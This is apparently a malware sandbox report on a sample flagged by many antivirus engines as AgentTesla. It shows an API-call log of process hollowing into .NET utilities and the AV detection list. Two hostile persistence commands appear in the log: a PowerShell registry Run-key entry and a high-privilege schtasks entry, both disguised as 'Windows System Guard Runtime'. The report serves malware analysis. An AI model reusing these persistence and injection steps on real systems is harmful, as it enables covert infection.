CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2592 thread_handle: 0x000006e0 process_identifier: 2588 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Roamiing\dataencod.exe track: 1 command_line: "C:\Roamiing\dataencod.exe" filepath_r: C:\Roamiing\dataencod.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000720	1	1
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2636 thread_handle: 0x000006d8 process_identifier: 2632 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Roamiing\msiexec2.exe track: 1 command_line: "C:\Roamiing\msiexec2.exe" filepath_r: C:\Roamiing\msiexec2.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000738	1	1
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000005f4 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x0000075c suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000770 suspend_count: 1 process_identifier: 2324	1	0
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2888 thread_handle: 0x00000774 process_identifier: 2840 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe track: 1 command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000778	1	1
NtGetContextThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000774	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2840 region_size: 344064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000778	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Æbà0Ü®û @ @``ûK H.text´Û Ü `.rsrcÞ@@.reloc ö@B base_address: 0x00400000 process_identifier: 2840 process_handle: 0x00000778	1	1
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x0000078c suspend_count: 1 process_identifier: 2324	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: base_address: 0x00402000 process_identifier: 2840 process_handle: 0x00000778	1	1
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: base_address: 0x00450000 process_identifier: 2840 process_handle: 0x00000778	1	1
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: ð°; base_address: 0x00452000 process_identifier: 2840 process_handle: 0x00000778	1	1
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2840 process_handle: 0x00000778	1	1
NtSetContextThread Aug. 18, 2022, 5:28 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4520878 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000774 process_identifier: 2840	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000774 suspend_count: 1 process_identifier: 2840	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2512	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 2512	1	0
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2716 thread_handle: 0x000001b4 process_identifier: 2712 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime' -Value '"C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe"' -PropertyType 'String' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000001ac	1	1
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000001b4 suspend_count: 1 process_identifier: 2512	1	0
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2784 thread_handle: 0x00000218 process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /C schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000022c	1	1
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2860 thread_handle: 0x0000023c process_identifier: 2856 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: #cmd filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000240	1	1
NtGetContextThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x0000023c	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2856 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000240		3221225496
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2924 thread_handle: 0x00000248 process_identifier: 2920 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe track: 1 command_line: #cmd filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000024c	1	1
NtGetContextThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000248	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2920 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000024c	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à²^Ð à@ @ÐSà H.textd° ² `.rsrc à ´@@.reloc¾@B base_address: 0x00400000 process_identifier: 2920 process_handle: 0x0000024c	1	1
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: base_address: 0x00402000 process_identifier: 2920 process_handle: 0x0000024c	1	1
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: 8Ph àìäääì4VS_VERSION_INFO½ïþæaJæaJ?DVarFileInfo$Translation°JStringFileInfo&000004b0CommentsLCompanyNameMicrosoft CorporationRFileDescriptioniSCSI Discovery tool>FileVersion6.2.19041.17662 InternalNameiscsicli.LegalCopyright© Microsoft Corporation. All rights reserved.*LegalTrademarks: OriginalFilenameiscsiclij%ProductNameMicrosoft® Windows® Operating SystemBProductVersion6.2.19041.1766FAssembly Version6.2.19041.1766ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0040e000 process_identifier: 2920 process_handle: 0x0000024c	1	1
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: Ð`0 base_address: 0x00410000 process_identifier: 2920 process_handle: 0x0000024c	1	1
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2920 process_handle: 0x0000024c	1	1

File has been identified by 56 AntiVirus engines on VirusTotal as malicious (50 out of 56 events)

Bkav	W32.AIDetectNet.01
Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.49325309
FireEye	Generic.mg.a20fe7a245e150d0
CAT-QuickHeal	Trojan.Agenttesla
ALYac	Trojan.GenericKD.49325309
Cylance	Unsafe
Zillya	Trojan.Kryptik.Win32.3822625
Sangfor	Suspicious.Win32.Save.a
K7AntiVirus	Trojan ( 0059541e1 )
BitDefender	Trojan.GenericKD.49325309
K7GW	Trojan ( 0059541e1 )
CrowdStrike	win/malicious_confidence_100% (W)
Cyren	W32/MSIL_Kryptik.HQH.gen!Eldorado
Symantec	Packed.Generic.619
tehtris	Generic.Malware
ESET-NOD32	a variant of MSIL/Kryptik.AFQI
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Backdoor.MSIL.Androm.gen
Alibaba	Backdoor:MSIL/AgentTesla.a0bf7822
Rising	Backdoor.Androm!8.113 (CLOUD)
Ad-Aware	Trojan.GenericKD.49325309
Comodo	Malware@#25vn151fyzyia
DrWeb	Trojan.PackedNET.1431
VIPRE	Trojan.GenericKD.49325309
TrendMicro	TROJ_GEN.R03FC0DG922
McAfee-GW-Edition	PWS-FDMT!A20FE7A245E1
Emsisoft	Trojan.GenericKD.49325309 (B)
Ikarus	Trojan.MSIL.Crypt
Jiangmin	Backdoor.MSIL.fswn
Webroot	W32.Trojan.Gen
Avira	TR/Kryptik.wjdqx
Antiy-AVL	Trojan/Generic.ASMalwS.5E35
Kingsoft	Win32.Hack.Undef.(kcloud)
Microsoft	Trojan:MSIL/AgentTesla.RPK!MTB
Gridinsoft	Trojan.Win32.Kryptik.cl
GData	Trojan.GenericKD.49325309
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.C5197639
Acronis	suspicious
McAfee	PWS-FDMT!A20FE7A245E1
MAX	malware (ai score=100)
VBA32	Malware-Cryptor.MSIL.AgentTesla.Heur
Malwarebytes	Malware.AI.4140625078
TrendMicro-HouseCall	TROJ_GEN.R03FC0DG922
Tencent	Msil.Backdoor.Androm.Ligl
Yandex	Trojan.Kryptik!HeZLotlwpvs
SentinelOne	Static AI - Malicious PE

final00.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All